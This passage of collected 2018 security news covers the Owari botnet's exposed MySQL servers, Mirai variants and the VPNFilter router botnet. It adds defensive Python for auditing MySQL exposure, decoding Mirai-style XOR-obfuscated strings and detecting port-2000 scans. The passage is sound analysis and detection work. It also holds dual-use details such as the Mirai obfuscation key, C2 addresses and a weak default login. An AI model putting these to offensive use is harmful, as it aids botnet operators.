Having access to the database, the security researchers glanced through the three tables. The users table contained login credentials (for both malware authors and customers), and information such as attack duration limits, maximum available bots, and cooldown time between commands.

“In the specific Owari case, we observe one user with duration limit of 3600 seconds with permissible bot usage set as -1 (maximum). It is to be noted that the credentials of all these botnet users are also weak,” the security researchers reveal.

The history table revealed details on attacks carried out against various IPs (some were IoT botnet related, suggesting that the attacker might have tried to target rival botnet operators), while the whitelist table was empty, suggesting that the botnet would attack any IP or device.

The security researchers also discovered that this was only one of the two Owari-related MySQL databases exposed to the Internet and secured with root:root, with the second one located at IP 80(.)211(.)45(.)89.

Unfortunately, although they gained write access to the MySQL databases, the researchers couldn’t disrupt the botnet, because C&C-related IPs usually have a short lifespan, as they tend to be flagged fast due to bad network traffic. Thus, they often change the IPs, and the two mentioned above are already offline.

Ankit Anubhav, Principal Researcher, NewSky Security, reveals that they decided to contact an Owari operator to ask about the revenue model, and learned that the cost of hiring the botnet is $60 per month, which involves “around 600 seconds of bot time.” Because of that, the operator can “guarantee a stable bot count,” and can cover expenses with 10 to 15 customers each month.
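The mistakes described in this article and the two Owari pieces above (a MySQL listener reachable from the Internet, accounts permitted to connect from any host, and root:root) are exactly what an operator should audit on their own database servers. The following is an added example, not NewSky Security's tooling: it parses the [mysqld] section of a my.cnf, reviews user/host/authentication rows of the kind found in mysql.user, and flags the exposed layout next to a hardened one. Both configurations and all user rows are constructed; the password hashes are computed locally with the mysql_native_password formula, and WEAK_PASSWORDS is a small stand-in for a proper dictionary.

```python
"""Audit a MySQL deployment for the Owari-style mistakes: a server reachable
from the Internet, accounts allowed to connect from any host, and default or
weak passwords. Added example; configs and user rows are constructed, not
taken from the C&C servers in the article.
"""
import hashlib
import re

LOOPBACK = {"localhost", "127.0.0.1", "::1"}
# Small stand-in for a weak-credential dictionary.
WEAK_PASSWORDS = ["", "root", "password", "123456"]


def native_hash(password):
    """mysql_native_password stores '*' + SHA1(SHA1(pw)) as upper-case hex."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def parse_mysqld_section(cnf_text):
    """Return key/value options from the [mysqld] section of a my.cnf."""
    opts, in_section = {}, False
    for line in cnf_text.splitlines():
        line = line.split("#", 1)[0].strip()      # drop comments and blanks
        if not line:
            continue
        m = re.match(r"^\[(.+)\]$", line)
        if m:
            in_section = m.group(1).strip().lower() == "mysqld"
            continue
        if in_section:
            key, _, val = line.partition("=")
            opts[key.strip().replace("_", "-")] = val.strip()
    return opts


def audit(cnf_text, user_rows):
    """user_rows: (user, host, authentication_string) tuples as in mysql.user.
    Returns a list of findings; an empty list means nothing was flagged."""
    findings = []
    opts = parse_mysqld_section(cnf_text)
    if "skip-networking" not in opts:             # TCP listener enabled
        bind = opts.get("bind-address")
        if bind is None:
            findings.append("bind-address not set: listener scope depends on build defaults")
        elif bind not in LOOPBACK:
            findings.append(f"bind-address={bind}: port 3306 reachable from remote hosts")
    for user, host, auth in user_rows:
        # The user/host pair is the second half of the triplet: even with a
        # public listener, only hosts named here may authenticate.
        if "%" in host:
            findings.append(f"{user}@{host}: account accepts connections from any host")
        elif user == "root" and host not in LOOPBACK:
            findings.append(f"root@{host}: superuser allowed to connect remotely")
        candidates = WEAK_PASSWORDS + [user]      # password == username is common
        if auth == "" or any(auth == native_hash(w) for w in candidates):
            findings.append(f"{user}@{host}: empty or dictionary password")
    return findings


# Constructed: the exposed layout (all interfaces, root@'%' with root:root).
WEAK_CNF = """
[mysqld]
bind-address = 0.0.0.0
port = 3306
"""
WEAK_USERS = [
    ("root", "%", native_hash("root")),
    ("app", "%", native_hash("app")),
]

# Constructed: the hardened layout (loopback only, local root, strong secrets).
HARDENED_CNF = """
[mysqld]
bind-address = 127.0.0.1
port = 3306
"""
HARDENED_USERS = [
    ("root", "localhost", native_hash("Correct-Horse-Battery-Staple-9")),
    ("app", "localhost", native_hash("Ng8#vbQpL2@xr7Wm")),
]

if __name__ == "__main__":
    for label, cnf, users in (("weak", WEAK_CNF, WEAK_USERS),
                              ("hardened", HARDENED_CNF, HARDENED_USERS)):
        print(label, audit(cnf, users) or ["no findings"])
```

The check mirrors the point made in the tweets: reaching a MySQL server from the Internet takes both a non-loopback bind-address and a user/host pair that admits the remote host, so a hardened server fails neither test. Feed it the real my.cnf and a `SELECT user, host, authentication_string FROM mysql.user` export; servers using caching_sha2_password will only be checked for empty strings, since that hash is salted.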


Mirai Variants Continue to Spawn in Vulnerable IoT Ecosystem
6.6.2018 securityweek BotNet

Mirai is the archetypal IoT botnet, first achieving infamy with a 665 Gbps DDoS attack against the KrebsOnSecurity website in September 2016. Within days, a second Mirai attack targeted the French hosting firm, OVH, with an attack that peaked at nearly 1 Tbps. These were, at the time, the largest DDoS attacks ever recorded.

But within a few more days, before the end of September 2016, the Mirai developer released the source code. It can now be found on GitHub. The developer closed his 'readme' file with a criticism of MalwareMustDie and the comment, "Just as I forever be free, you will be doomed to mediocracy forever."

He didn't remain free for very long. In January 2017, Brian Krebs identified Paras Jha as authoring Mirai; and in December 2017 the DoJ unsealed a plea-bargained guilty plea by Paras Jha for the development and use of Mirai. But it was too late to stop Mirai, because the code was in the public domain -- and it has ever since been used as the basic building block for other criminals to develop Mirai variants for their own use.

Network performance firm Netscout Arbor has taken a close look at four of the current Mirai variants: Satori, JenX, OMG and Wicked. Its Arbor Security Engineering & Response Team (ASERT) described in a recent blog post how each of these botnets starts from the basic building blocks of Mirai and adds to, and sometimes removes from, the original Mirai functionality -- adding, says ASERT, "their own flair."

Mirai itself spread by scanning for other internet-connected IoT devices (IP cameras and home routers) and 'brute-forcing' access via a list of default vendor passwords. Since so few consumers ever change the password that comes with the device, the process is remarkably successful. Paras Jha claimed that he had 380,000 bots in Mirai at the time of the Krebs attack.

Satori (or at least the 3rd variant of Satori) uses the same configuration table and the same string obfuscation technique as Mirai. However, says ASERT, "We see the author expanding on Mirai source code to include different exploits such as the Huawei Home Gateway exploit." The exploit was CVE-2017-17215. In December 2017, Check Point reported that hundreds of thousands of attempts to exploit this vulnerability had been made on Huawei HG532 home routers attempting to download and execute the Satori botnet.

The underlying code for JenX also comes from Mirai, again including the same configuration table and the same string obfuscation technique. However, JenX hard codes the C2 IP address while Mirai stores it in the configuration table. JenX has also removed the scanning and exploitation functions of Mirai, with this being handled by a separate system.
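ASERT's observation that Satori and JenX keep Mirai's configuration table and string obfuscation is something an analyst can test on a sample. In the leaked Mirai source the table entries are XOR-ed in turn with the four bytes of a 32-bit key (0xdeadbeef in the public code), which collapses to a single-byte XOR with 0x22. The block below is an added example, not ASERT's code: it recovers entries from such a table. The serialised id/length/bytes layout, the entry ids and the placeholder strings are this example's own constructions, not the layout or contents of any real sample.

```python
"""Recover strings from a Mirai-style obfuscated configuration table.

The public Mirai source XORs each table byte with the four bytes of a 32-bit
key (0xdeadbeef); applying four XORs in sequence equals one XOR with their
combination, 0xde ^ 0xad ^ 0xbe ^ 0xef == 0x22. Added example; the table
blob below is constructed from placeholder strings, not from a sample.
"""
import struct

TABLE_KEY = 0xDEADBEEF


def effective_key(key32):
    """Fold the four key bytes into the single byte the loop really applies."""
    k = 0
    for shift in (0, 8, 16, 24):
        k ^= (key32 >> shift) & 0xFF
    return k


def toggle_obf(data, key32=TABLE_KEY):
    """XOR every byte with the folded key. XOR is its own inverse, so the same
    call both obfuscates and recovers an entry."""
    k = effective_key(key32)
    return bytes(b ^ k for b in data)


def pack_entry(entry_id, plaintext):
    """Constructed serialisation for this example: id (1 byte), length
    (2 bytes little-endian), obfuscated bytes. In the real bot the table
    is a C array in the binary, not a serialised blob."""
    obf = toggle_obf(plaintext)
    return struct.pack("<BH", entry_id, len(obf)) + obf


def unpack_table(blob, key32=TABLE_KEY):
    """Walk pack_entry() records and return {id: recovered string}."""
    entries, off = {}, 0
    while off < len(blob):
        entry_id, length = struct.unpack_from("<BH", blob, off)
        off += 3
        raw = toggle_obf(blob[off:off + length], key32)
        entries[entry_id] = raw.rstrip(b"\x00").decode("latin-1")
        off += length
    return entries


# Constructed stand-ins for table contents (ids and values are placeholders).
SAMPLE_TABLE = (
    pack_entry(1, b"c2.example.invalid\x00")   # C2 hostname placeholder
    + pack_entry(2, b"/bin/busybox\x00")       # string the bot uses on a new shell
)

if __name__ == "__main__":
    for entry_id, value in unpack_table(SAMPLE_TABLE).items():
        print(entry_id, repr(value))
```

When a variant changes the key, the folded-byte property still holds, so a quick way to spot a retained scheme is to XOR candidate regions of the binary with each of the 256 single-byte values and look for readable hostnames and paths; a variant such as JenX that hard-codes the C2 address will not have it in the table at all.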

"Currently," writes ASERT, "it appears JenX only focuses on DDoS attacks against players of the video game Grand Theft Auto San Andreas, which has been noted by other researchers."

OMG is described by ASERT as one of the most interesting of Mirai variants. While it includes all Mirai's functionality, "the author expanded the Mirai code to include a proxy server." This allows it to enable a SOCKS and HTTP proxy server on the infected IoT device. "With these two features, the bot author can proxy any traffic of its choosing through the infected IoT device, including additional scans for new vulnerabilities, launching additional attacks, or pivot from the infected IoT device to other networks which are connected to the device."

Fortinet discussed OMG in February 2018. "This is the first time we have seen a modified Mirai capable of DDOS attacks as well as setting up proxy servers on vulnerable IoT devices. With this development, we believe that more and more Mirai-based bots are going to emerge with new ways of monetization," it concluded.

Wicked is the latest Mirai variant. "Similar to Satori variant 3," writes ASERT, "Wicked trades in Mirai's credential scanning function for its own RCE scanner. Wicked's RCE scanner targets Netgear routers and CCTV-DVR devices." When vulnerable devices are found, "a copy of the Owari bot is downloaded and executed."

However, an analysis of the same bot by Fortinet in May 2018 comes to a slightly different conclusion. The string 'SoraLOADER' suggests a purpose to distribute the Sora botnet. Further analysis showed that in practice it attempted to download the Owari botnet, but actually downloaded the Omni botnet. "We can essentially confirm that the author of the botnets Wicked, Sora, Owari, and Omni are one and the same. This also leads us to the conclusion that while the WICKED bot was originally meant to deliver the Sora botnet, it was later repurposed to serve the author's succeeding projects," says Fortinet.

The Mirai developer may have been apprehended, but because his source code was made public, Mirai and its variants continue to grow. The IoT ecosphere that Mirai and its variants target and exploit is still in its infancy. There were nearly 17 billion connected devices in 2017, and this is expected to rise to around 125 billion by 2030 according to a new analysis from IHS Markit. Vendors continue to rush their products to market in order to get early market share, but often at the cost of built-in security.

"Malware authors will continue to leverage IoT based malware in automated fashion, quickly increasing the botnet size through worm-like spreading, network proxy functionality, and automated exploitation of vulnerabilities in internet facing devices. It is important for organizations to apply proper patching, updates, and DDoS mitigation strategies to defend their organizations," warns ASERT.



Experts believe the VPNFilter botmaster is attempting to resume the botnet
2.6.2018 securityaffairs BotNet

Experts from security firms GreyNoise Intelligence and JASK believe that the threat actor behind VPNFilter is now attempting to resume the botnet with a new wave of infections.
A week ago security experts and law enforcement bodies reported the existence of a huge Russia-linked botnet tracked as VPNFilter.

The botnet infected over 500,000 routers and NAS devices, most of them in Ukraine; fortunately, prompt action by the authorities allowed it to be taken down.

Researchers believe the nation-state malware was developed by the same author of the BlackEnergy malware.

Many infected devices have been discovered in Ukraine and their number in the country continues to increase. On May 8, Talos researchers observed a spike in VPNFilter infection activity; most of the infections were in Ukraine, and the majority of compromised devices contacted a separate stage 2 C2 infrastructure at the IP 46.151.209[.]33.

The experts discovered the VPNFilter malware has infected devices manufactured by Linksys, MikroTik, Netgear, QNAP, and TP-Link.

Unfortunately, monitoring of the malicious traffic associated with VPNFilter shows that the botmasters are attempting to resume the botnet.

Experts from security firms GreyNoise Intelligence and JASK believe that the same threat actor is now attempting to resume the botnet with a new wave of infections.

“JASK actively partners with GreyNoise Intelligence (GNI) to establish better access and visibility for global and regional SYN traffic. Preliminary analysis of GNI results identifies a number of source IPs exclusively scanning for port 2000 (MikroTik devices) in Ukrainian networks.” states a report published by JASK.

“Activity like this raises some interesting questions about indications of ongoing Ukraine targeted campaigns, a likely subject for future research.”

The scans detected by the experts show threat actors targeting MikroTik routers on Ukrainian networks with port 2000 exposed online.
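The JASK observation (sources scanning exclusively for port 2000 across Ukrainian networks) can be turned into a detection over SYN-only flow records: a source that sends SYNs into monitored address space, touches no port other than 2000, and reaches several distinct hosts is the pattern to alert on. The block below is an added example, not JASK's or GreyNoise's code; the flow lines are constructed, and MONITORED_PREFIXES uses documentation ranges as stand-ins for the prefixes a defender actually watches.

```python
"""Flag sources whose SYN traffic targets only TCP/2000 across many hosts in
monitored prefixes, the scan pattern reported against MikroTik devices.
Added example; flow lines and prefixes are constructed.
"""
import ipaddress
from collections import defaultdict

# Constructed: prefixes the defender is responsible for (documentation ranges
# as stand-ins, not real Ukrainian allocations).
MONITORED_PREFIXES = [ipaddress.ip_network("203.0.113.0/24"),
                      ipaddress.ip_network("198.51.100.0/24")]

# Constructed flow records: "<epoch> <src> <dst> <dport> <tcp-flags>".
SAMPLE_FLOWS = """\
1527900000 192.0.2.10 203.0.113.5 2000 S
1527900001 192.0.2.10 203.0.113.6 2000 S
1527900002 192.0.2.10 203.0.113.7 2000 S
1527900003 192.0.2.10 198.51.100.9 2000 S
1527900004 192.0.2.10 203.0.113.8 2000 S
1527900005 192.0.2.77 203.0.113.5 22 S
1527900006 192.0.2.77 203.0.113.5 80 S
1527900007 192.0.2.77 203.0.113.5 2000 S
1527900008 192.0.2.99 203.0.113.40 2000 S
1527900009 192.0.2.99 203.0.113.40 2000 S
1527900010 192.0.2.55 203.0.113.1 443 SA
"""


def parse_flow(line):
    """Split one record into (epoch, src, dst, dport, flags)."""
    ts, src, dst, dport, flags = line.split()
    return int(ts), src, dst, int(dport), flags


def in_monitored(dst):
    """True when dst falls inside one of the watched prefixes."""
    addr = ipaddress.ip_address(dst)
    return any(addr in net for net in MONITORED_PREFIXES)


def find_port2000_scanners(lines, target_port=2000, min_hosts=3):
    """Return {src: distinct_host_count} for sources whose SYN-only probes into
    monitored space hit only target_port on at least min_hosts destinations.
    A source that also probes other ports is a generic scanner, not this
    campaign's signature, and is left out."""
    ports_by_src = defaultdict(set)
    hosts_by_src = defaultdict(set)
    for line in lines:
        if not line.strip():
            continue
        _, src, dst, dport, flags = parse_flow(line)
        if flags != "S" or not in_monitored(dst):   # bare SYNs into our space only
            continue
        ports_by_src[src].add(dport)
        if dport == target_port:
            hosts_by_src[src].add(dst)
    return {src: len(hosts)
            for src, hosts in hosts_by_src.items()
            if ports_by_src[src] == {target_port} and len(hosts) >= min_hosts}


if __name__ == "__main__":
    for src, count in find_port2000_scanners(SAMPLE_FLOWS.splitlines()).items():
        print(f"{src}: port-2000-only SYNs to {count} monitored hosts")
```

On the constructed data only 192.0.2.10 is reported: 192.0.2.77 also probes ports 22 and 80, 192.0.2.99 never leaves a single host, and the 192.0.2.55 record is a SYN/ACK rather than a probe. Lower min_hosts for a small prefix, and feed the function flow exports one record per line.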

The VPNFilter malware is very sophisticated and implements many functionalities typical of nation-state malware, such as firmware wiping, communication via Tor, traffic monitoring, and the ability to target ICS devices.

The US authorities blamed the Russia-linked APT28 hacking group for the creation of the botnet; Ukrainian bodies must be vigilant in order to thwart any cyber-attacks that could be powered by the VPNFilter botnet.


Massive Russia-Linked Botnet Raises Concerns of New Attack on Ukraine
24.5.2018 securityweek  BotNet

Russia-made VPNFilter malware infects 500,000 devices in preparation of new Ukraine attack

Russia may be preparing for another massive cyberattack on Ukraine using a botnet of at least 500,000 compromised routers and network-attached storage (NAS) devices, Cisco’s Talos threat intelligence group reported on Wednesday.

The botnet is powered by a sophisticated piece of malware that researchers have dubbed VPNFilter based on the names of some folders created by the threat. Talos has worked with several other cybersecurity firms and law enforcement agencies to investigate VPNFilter. While the investigation is ongoing, an initial report has been published due to concerns that an attack involving the botnet may be imminent.

Researchers believe a state-sponsored or state-affiliated threat actor is likely behind the attack and Russia has been named the main suspect due to code overlaps with the BlackEnergy malware, which has been attributed by many to the Kremlin.

More than 500,000 hacked devices have been observed across 54 countries, but many infections have been spotted in Ukraine and their number continues to increase. The malware has compromised devices made by Linksys, MikroTik, Netgear, TP-Link and QNAP, and while experts have yet to identify the attack vector they are confident that no zero-day vulnerabilities are involved.

VPNFilter is a modular piece of malware that has a wide range of capabilities. It can intercept data passing through the compromised device, including website credentials, and it can monitor the network for communications over the Modbus SCADA protocol. The malware, which uses Tor to communicate with a control panel, also has destructive capabilities that can be leveraged to make an infected device unusable.

“The destructive capability particularly concerns us. This shows that the actor is willing to burn users' devices to cover up their tracks, going much further than simply removing traces of the malware. If it suited their goals, this command could be executed on a broad scale, potentially rendering hundreds of thousands of devices unusable, disabling internet access for hundreds of thousands of victims worldwide or in a focused region where it suited the actor's purposes,” Talos said in its report.

Researchers are concerned that VPNFilter may be used for another massive attack on Ukraine not only due to the large number of infections and a separate command and control (C&C) infrastructure for devices in this country, but also because there are only a few weeks until Ukraine celebrates its Constitution Day.

Last year, the NotPetya wiper attack was launched on the eve of Ukraine’s Constitution Day. NotPetya has been officially attributed to Russia by the U.S. and other countries and researchers have also linked the malware to BlackEnergy.

The fact that the malware monitors Modbus communications, which are typically used for supervisory control and data acquisition (SCADA) systems, suggests that the attacker may also be targeting industrial control systems (ICS).

Threat groups believed to be working for the Russian government have been known to launch attacks on ICS, including on Ukraine’s energy sector back in December 2016 using a piece of malware tracked as Industroyer and CRASHOVERRIDE. There are several other Russia-linked actors that have targeted industrial systems, including Dragonfly and Dymalloy.

“VPNFilter is an expansive, robust, highly capable, and dangerous threat that targets devices that are challenging to defend. Its highly modular framework allows for rapid changes to the actor's operational infrastructure, serving their goals of misattribution, intelligence collection, and finding a platform to conduct attacks,” Talos said.


U.S. Disrupts Russian Botnet of 500,000 Hacked Routers
24.5.2018 securityweek  BotNet

The US Justice Department said Wednesday that it had seized an internet domain that directed a dangerous botnet of a half-million infected home and office network routers, controlled by hackers believed tied to Russian intelligence.

The move was aimed at breaking up an operation deeply embedded in small and medium-sized computer networks that could allow the hackers to take control of computers as well as easily steal data.

The Justice Department said the "VPNFilter" botnet was set up by a hacking group variously called APT28, Pawn Storm, Sandworm, Fancy Bear and the Sofacy Group.

The group is blamed for cyber attacks on numerous governments, key infrastructure industries like power grids, the Organization for Security and Co-operation in Europe, the World Anti-Doping Agency, and other bodies.

US intelligence agencies also say it was involved in the operation to hack and release damaging information on the Democratic Party during the 2016 US presidential election, and has engineered a number of computer network disruptions in Ukraine.

"According to cybersecurity researchers, the Sofacy Group is a cyber-espionage group believed to have originated from Russia," the Department of Justice said in a court filing.

"Likely operating since 2007, the group is known to typically target government, military, security organizations, and other targets of intelligence value, through a variety of means," it said.

The Justice filing did not say who was behind Sofacy Group, but US intelligence has in the past linked it to Russia's GRU military intelligence agency, and numerous private computer security groups have made the same connection.

In Wednesday's action, the Justice Department said it had obtained a warrant authorizing the FBI to seize a computer domain that is part of the command and control system of the VPNFilter botnet.

The botnet targets home and office routers, through which it can relay orders from the botnet's controllers and intercept and reroute traffic back to them, virtually undetected by the users of a network.

In a report released in parallel to the Justice announcement, network equipment giant Cisco said VPNFilter had infected at least 500,000 devices in at least 54 countries.

It has targeted popular router brands like Linksys, MikroTik, NETGEAR and TP-Link.

"The behavior of this malware on networking equipment is particularly concerning, as components of the VPNFilter malware allows for theft of website credentials," Cisco said.

It also has "a destructive capacity that can render an infected device unusable, which can be triggered on individual victim machines or en masse."

Both Justice and Cisco said they were releasing details of the problem before having found a strong, permanent fix. Justice said that by seizing control of one of the domains involved in running VPNFilter, it will give owners of infected routers a chance to reboot them, forcing them to begin communicating with the now-neutralized command domain.

The vulnerability will remain, Justice said, but the move will allow them more time to identify and intervene in other parts of the network.